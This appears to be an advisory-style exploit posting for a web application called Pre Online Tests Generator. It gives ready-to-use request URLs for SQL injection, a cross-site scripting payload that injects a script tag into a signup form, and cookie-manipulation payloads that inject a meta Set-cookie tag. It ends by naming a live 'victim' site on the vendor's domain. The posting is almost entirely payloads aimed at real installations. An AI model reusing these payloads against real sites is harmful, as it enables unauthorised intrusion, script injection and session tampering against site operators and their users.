Pre Online Tests Generator suffers from cookie manipulation, cross site scripting, and remote SQL injection vulnerabilities.
7ed9d488effb42a041312aba8e4f720435122c01de52b3dcf3a4883692ff57e9
#########################################################
---------------------------------------------------------
Portal Name: Pre Online Tests Generator
Vendor : https://www.preproject.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,CM,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
https://site.com/[Path]/admin/view_users.php?skip=[SQL]
[XSS]:
https://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start
[CM]:
https://site.com/[Path]/admin/test_management.php?skip=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
https://site.com/[Path]admin/view_users.php?skip=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'
>
---------------------------------
Victem :
https://preproject.com/pclasp/